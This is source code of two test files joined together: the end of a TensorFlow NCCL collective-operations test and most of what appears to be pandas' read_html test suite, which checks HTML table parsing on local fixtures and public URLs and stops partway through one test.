"""All-gather concatenates each device's tensor in device order."""
self._setup_context()
inputs = [[0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1],
[0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]]
# Expected = inputs[0] followed by inputs[1].
expected = [0.1, 1.1, 2.1, 3.1, 4.1, 5.1, 6.1, 7.1,
0.3, 1.3, 2.3, 3.3, 4.3, 5.3, 6.3, 7.3]
group_key = 1
instance_key = 1
@def_function.function
def run_basic_nccl_all_gather():
collectives = []
for i in range(self._group_size):
with ops.device(self._devices[i]):
t = constant_op.constant(inputs[i])
collectives.append(collective_ops.all_gather(t, self._group_size,
group_key, instance_key))
return collectives
for result in run_basic_nccl_all_gather():
self.assertAllClose(result, expected, rtol=1e-5, atol=1e-5)
def testCollectiveDeviceMismatch(self):
"""Mixing CPU and GPU participants in one group must be rejected."""
self._setup_context()
group_key = 10
instance_key = 20
t0 = [1, 2, 3, 4]
t1 = [5, 6, 7, 8]
@def_function.function
def run_collective_device_mismatch():
# Same group_key from a CPU and a GPU device: inconsistent group type.
with ops.device('/CPU:0'):
in0 = constant_op.constant(t0)
collective_ops.all_reduce(in0, self._group_size, group_key,
instance_key, 'Add', 'Id')
with ops.device('/GPU:0'):
in1 = constant_op.constant(t1)
collective_ops.all_reduce(in1, self._group_size, group_key,
instance_key, 'Add', 'Id')
with self.assertRaisesRegex(errors.InternalError,
'but that group has type'):
run_collective_device_mismatch()
def testCollectiveReduceMinMax(self):
"""All-reduce with Min/Max merge ops over NCCL."""
self._setup_context()
@def_function.function
def run_all_reduce(group_key, instance_key, merge_op):
t0 = [1., 20., 3., 40., 5.]
t1 = [10., 2., 30., 4., 50.]
with ops.device('/GPU:0'):
in0 = constant_op.constant(t0)
c0 = collective_ops.all_reduce(
in0, self._group_size, group_key, instance_key, merge_op,
final_op='Id', communication_hint='nccl')
with ops.device('/GPU:1'):
in1 = constant_op.constant(t1)
c1 = collective_ops.all_reduce(
in1, self._group_size, group_key, instance_key, merge_op,
final_op='Id', communication_hint='nccl')
return c0, c1
# Each combination is (merge_op, expected element-wise result).
for combination in [('Max', [10., 20., 30., 40., 50.]),
('Min', [1., 2., 3., 4., 5.])]:
merge_op = combination[0]
results = run_all_reduce(group_key=10, instance_key=20, merge_op=merge_op)
expected = combination[1]
for result in results:
self.assertAllClose(result, expected, rtol=1e-5, atol=1e-5)
def testNcclStress(self):
"""Many back-to-back single-member collectives on one GPU."""
self._setup_context(num_gpus=1)
num_iters = 1000
for _ in range(num_iters):
with ops.device('/device:GPU:0'):
# NOTE(review): hint is uppercase 'NCCL' here vs lowercase elsewhere;
# presumably the hint is case-insensitive — confirm against the op docs.
collective_ops.all_reduce(
[1.], group_size=1, group_key=0, instance_key=0, merge_op='Add',
final_op='Id', communication_hint='NCCL')
@test_util.run_v2_only
def testAbortNccl(self):
"""Aborting the collective executor unblocks a hung NCCL collective."""
self._setup_context(num_gpus=2)
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant(1.)
# First perform a normal collective to finish resolution.
def collective_fn():
for device in ['GPU:0', 'GPU:1']:
with ops.device(device):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
'Add',
'Id',
communication_hint='nccl')
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Only one participant launches below, so the collective blocks until the
# abort thread fires; the abort must surface as UnavailableError.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
'Add',
'Id',
communication_hint='nccl')
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
'Add',
'Id',
communication_hint='nccl')
t.join()
# Reset the context in order to reset the collective executor.
context._reset_context()  # pylint: disable=protected-access
# After the reset, collectives must work again.
def_function.function(collective_fn)()
# Standard TensorFlow test entry point.
if __name__ == '__main__':
test.main()
|
test_html.py | from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
# Directory containing this test module; used to resolve test-data paths.
HERE = os.path.dirname(__file__)
# One file per encoding: UTF-16/32/8 plus a Latin-1 sample.
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
    """
    Assert that two lists hold pairwise-equal, non-empty DataFrames.

    Extra positional/keyword arguments are forwarded to
    ``tm.assert_frame_equal``.
    """
    assert len(list1) == len(list2), (
        "lists are not of equal size "
        f"len(list1) == {len(list1)}, "
        f"len(list2) == {len(list2)}"
    )
    msg = "not all list elements are DataFrames"
    both_frames = all(
        isinstance(left, DataFrame) and isinstance(right, DataFrame)
        for left, right in zip(list1, list2)
    )
    assert both_frames, msg
    for left, right in zip(list1, list2):
        tm.assert_frame_equal(left, right, *args, **kwargs)
        assert not left.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
"""An unsupported (too old) BeautifulSoup version must raise ImportError."""
import bs4
# Pretend an ancient bs4 is installed; read_html must refuse to use it.
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
    """read_html must reject an unrecognized parser flavor with ValueError."""
    flavor = "invalid flavor"
    url = "google.com"
    expected_msg = r"\{" + flavor + r"\} is not a valid set of flavors"
    with pytest.raises(ValueError, match=expected_msg):
        read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
"""The lxml and bs4 flavors must return equal tables in the same order."""
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
# Resolve the shared test-data paths once per test.
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
# Bind the class-level parametrized flavor so every test can just call
# self.read_html without repeating the flavor argument.
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
"""Round trip: DataFrame -> to_html -> read_html reproduces the frame."""
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
# Format to 3 decimals then parse back to float so the round trip
# through HTML text compares exactly.
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@pytest.mark.network
@tm.network(
url=(
"https://www.fdic.gov/resources/resolutions/"
"bank-failures/failed-bank-list/index.html"
),
check_before_test=True,
)
def test_banklist_url_positional_match(self):
"""Passing ``match`` positionally is deprecated and warns."""
url = "https://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html"  # noqa E501
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
"First Federal Bank of Florida",  # attrs={"class": "dataTable"}
)
with tm.assert_produces_warning(FutureWarning):
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
"Metcalf Bank",
)  # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network(
url=(
"https://www.fdic.gov/resources/resolutions/"
"bank-failures/failed-bank-list/index.html"
),
check_before_test=True,
)
def test_banklist_url(self):
"""Two different match strings on the same page find the same table."""
url = "https://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html"  # noqa E501
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
match="First Federal Bank of Florida",  # attrs={"class": "dataTable"}
)
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
match="Metcalf Bank",
)  # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network(
url=(
"https://raw.githubusercontent.com/pandas-dev/pandas/main/"
"pandas/tests/io/data/html/spam.html"
),
check_before_test=True,
)
def test_spam_url(self):
"""Reading the spam fixture over HTTP behaves like reading it locally."""
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/main/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
"""Different match strings locate the same table in the banklist file."""
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
"""Basic parse of the spam fixture, checking a known cell and column."""
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
# Without a match pattern, every table parses to a DataFrame.
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
# attrs-only selection (no match) also yields DataFrames.
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
"""header=2 promotes the third row to the column header."""
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
# Every accepted type for ``skiprows``: int, range, list, set, slice,
# ndarray — all should produce the same parse for equivalent row sets.
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
# Order of the skipped-row list must not matter.
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
# NOTE(review): passes an int, not a slice — duplicates test_skiprows_int;
# presumably slice(2) was intended here. Verify against upstream history.
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
# A forward slice and its reversed equivalent skip the same rows.
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
# A string is not an accepted skiprows type.
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self):
# index_col alone.
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
# NOTE(review): identical body to test_header_and_index_no_types — the
# distinguishing infer_types argument was removed (see GH 10892 below).
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
# read_html must accept the same content as a StringIO, a raw string,
# and an open file object.
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, match=".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network
def test_bad_url_protocol(self):
"""Unsupported URL schemes surface as URLError."""
with pytest.raises(URLError, match="urlopen error unknown url type: git"):
self.read_html("git://github.com", match=".*Water.*")
@pytest.mark.slow
@pytest.mark.network
@tm.network
def test_invalid_url(self):
"""A non-resolvable host raises URLError or ValueError."""
# Accept either DNS failure message (platform dependent) or the
# "No tables found" ValueError if the request unexpectedly resolves.
msg = (
"Name or service not known|Temporary failure in name resolution|"
"No tables found"
)
with pytest.raises((URLError, ValueError), match=msg):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
@pytest.mark.slow
def test_file_url(self):
"""A file:// URL works like a local path."""
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
"""attrs matching no table must raise 'No tables found'."""
url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
# Shared helper: parse the banklist fixture, forwarding extra arguments
# (header, index_col, skiprows, ...) to read_html.
return self.read_html(
self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
# NOTE(review): identical body to test_multiindex_header_skiprows below;
# presumably this once passed tuple-based skiprows — verify upstream.
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
# A pre-compiled regex (even doubly wrapped) is accepted as match.
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
# Negative skiprows values are rejected.
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, match="Water", skiprows=-1)
@pytest.mark.network
@tm.network(url="https://docs.python.org/2/", check_before_test=True)
def test_multiple_matches(self):
"""A broad match string can return more than one table."""
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@pytest.mark.network
@tm.network(url="https://docs.python.org/2/", check_before_test=True)
def test_python_docs_table(self):
"""Spot-check the first cell of each matched table on docs.python.org."""
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
# First four characters of each table's top-left cell.
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
    """
    Ensure parser adds <tr> within <thead> on malformed HTML.
    """
    # NOTE(review): a <th> inside <tbody> ("Odessa") must still be parsed
    # as a data cell, not promoted into the header.
    result = self.read_html(
        """<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
    )[0]
    expected = DataFrame(
        data=[["Ukraine", "Odessa", 1944]],
        columns=["Country", "Municipality", "Year"],
    )
    tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
    """
    Make sure that read_html reads tfoot, containing td or th.
    Ignores empty tfoot
    """
    data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
    # Empty footer: only the body row survives.
    expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
    # Non-empty footer: footer row (mixed td/th) is appended after the body.
    expected2 = DataFrame(
        data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
    )
    data1 = data_template.format(footer="")
    data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
    result1 = self.read_html(data1)[0]
    result2 = self.read_html(data2)[0]
    tm.assert_frame_equal(result1, expected1)
    tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
    # GH5048: if header is specified explicitly, an int column should be
    # parsed as int while its header is parsed as str
    result = self.read_html(
        """
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
        header=0,
    )[0]
    # 1944 stays numeric in the data row even though the header cell "I"
    # came from an ordinary <td>.
    expected = DataFrame([["text", 1944]], columns=("S", "I"))
    tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
    from pandas.io.html import _remove_whitespace

    def try_remove_ws(x):
        """Collapse whitespace in *x*; non-string values pass through unchanged."""
        try:
            return _remove_whitespace(x)
        except AttributeError:
            return x

    df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[
        0
    ]
    ground_truth = read_csv(
        datapath("io", "data", "csv", "banklist.csv"),
        converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
    )
    assert df.shape == ground_truth.shape
    # The HTML page appends language-link text (e.g. "En Espanol") to some
    # bank names; map those back to the plain names used in the CSV fixture.
    old = [
        "First Vietnamese American BankIn Vietnamese",
        "Westernbank Puerto RicoEn Espanol",
        "R-G Premier Bank of Puerto RicoEn Espanol",
        "EurobankEn Espanol",
        "Sanderson State BankEn Espanol",
        "Washington Mutual Bank(Including its subsidiary Washington "
        "Mutual Bank FSB)",
        "Silver State BankEn Espanol",
        "AmTrade International BankEn Espanol",
        "Hamilton Bank, NAEn Espanol",
        "The Citizens Savings BankPioneer Community Bank, Inc.",
    ]
    new = [
        "First Vietnamese American Bank",
        "Westernbank Puerto Rico",
        "R-G Premier Bank of Puerto Rico",
        "Eurobank",
        "Sanderson State Bank",
        "Washington Mutual Bank",
        "Silver State Bank",
        "AmTrade International Bank",
        "Hamilton Bank, NA",
        "The Citizens Savings Bank",
    ]
    dfnew = df.applymap(try_remove_ws).replace(old, new)
    gtnew = ground_truth.applymap(try_remove_ws)
    # Coerce HTML-parsed strings to datetimes/numerics before comparing.
    converted = dfnew._convert(datetime=True, numeric=True)
    date_cols = ["Closing Date", "Updated Date"]
    converted[date_cols] = converted[date_cols].apply(to_datetime)
    tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
    """A bank name present in the raw HTML must survive into the DataFrame."""
    needle = "Gold Canyon"
    with open(self.banklist_data) as f:
        assert needle in f.read()
    parsed = self.read_html(
        self.banklist_data, match="Gold Canyon", attrs={"id": "table"}
    )[0]
    assert needle in parsed.to_string()
def test_different_number_of_cols(self):
    """A short row (missing trailing cells) is padded with NaN to full width."""
    # Baseline: the same table with the missing cells spelled out as "nan".
    expected = self.read_html(
        """<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
        index_col=0,
    )[0]
    # Same table, but the first body row simply stops after two cells.
    result = self.read_html(
        """<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
        index_col=0,
    )[0]
    tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
    # GH17054
    # colspan="1"/rowspan="1" are no-ops and must not duplicate cells.
    result = self.read_html(
        """
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
    )[0]
    expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
    tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
    # GH17054
    # In ASCII, with lowercase letters being copies:
    #
    # X x Y Z W
    # A B b z C
    result = self.read_html(
        """
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
        header=0,
    )[0]
    # Duplicated header cell "X" is deduplicated to "X.1" in the columns.
    expected = DataFrame(
        data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
    )
    tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
    # GH17054
    # In ASCII, with lowercase letters being copies:
    #
    # A B b b C
    # a b b b D
    result = self.read_html(
        """
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
        header=0,
    )[0]
    # "B" spans both rows and three columns; header dedupe yields B.1, B.2.
    expected = DataFrame(
        data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
    )
    tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
    # GH17054
    # In ASCII, with lowercase letters being copies:
    #
    # A B
    # C b
    result = self.read_html(
        """
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
        header=0,
    )[0]
    # The rowspanned "B" fills the trailing cell of the second row.
    expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
    tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
    # GH17054
    # A table consisting solely of a rowspan="3" row: the first copy acts
    # as the header, the remaining two copies become data rows.
    result = self.read_html(
        """
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
        header=0,
    )[0]
    expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
    tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
    # GH17054
    # Two leading rows containing only <th> cells are inferred as a
    # two-level MultiIndex header.
    result = self.read_html(
        """
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
    )[0]
    columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
    expected = DataFrame(data=[[1, 2]], columns=columns)
    tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
    """parse_dates accepts both column positions and column names."""
    df = DataFrame({"date": date_range("1/1/2001", periods=10)})
    html = df.to_html()
    # Positional ([1]) and by-name (["date"]) specs must round-trip equally.
    for spec in ([1], ["date"]):
        roundtripped = self.read_html(html, parse_dates=spec, index_col=0)
        tm.assert_frame_equal(df, roundtripped[0])
def test_parse_dates_combine(self):
    """parse_dates can merge separate date and time columns into one."""
    raw_dates = Series(date_range("1/1/2001", periods=10))
    df = DataFrame(
        {
            "date": [str(ts.date()) for ts in raw_dates],
            "time": [str(ts.time()) for ts in raw_dates],
        }
    )
    # Columns 1 and 2 of the rendered table are combined into "datetime".
    res = self.read_html(
        df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
    )
    newdf = DataFrame({"datetime": raw_dates})
    tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
    """Parse the bundled Wikipedia states page with a flat (row-1) header."""
    data = datapath("io", "data", "html", "wikipedia_states.html")
    assert os.path.isfile(data), f"{repr(data)} is not a file"
    assert os.path.getsize(data), f"{repr(data)} is an empty file"
    result = self.read_html(data, match="Arizona", header=1)[0]
    assert result.shape == (60, 12)
    # Last column has no header text, so it gets an "Unnamed" placeholder.
    assert "Unnamed" in result.columns[-1]
    assert result["sq mi"].dtype == np.dtype("float64")
    assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
    """Same fixture, but with the header inferred as a two-level MultiIndex."""
    data = datapath("io", "data", "html", "wikipedia_states.html")
    result = self.read_html(data, match="Arizona", index_col=0)[0]
    assert result.shape == (60, 11)
    # Second level of the last column is an "Unnamed" placeholder.
    assert "Unnamed" in result.columns[-1][1]
    assert result.columns.nlevels == 2
    assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
    # NOTE: the unclosed <th></tr> in the first header row is deliberate
    # malformed HTML; the empty header level becomes "Unnamed: *_level_0".
    result = self.read_html(
        """
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
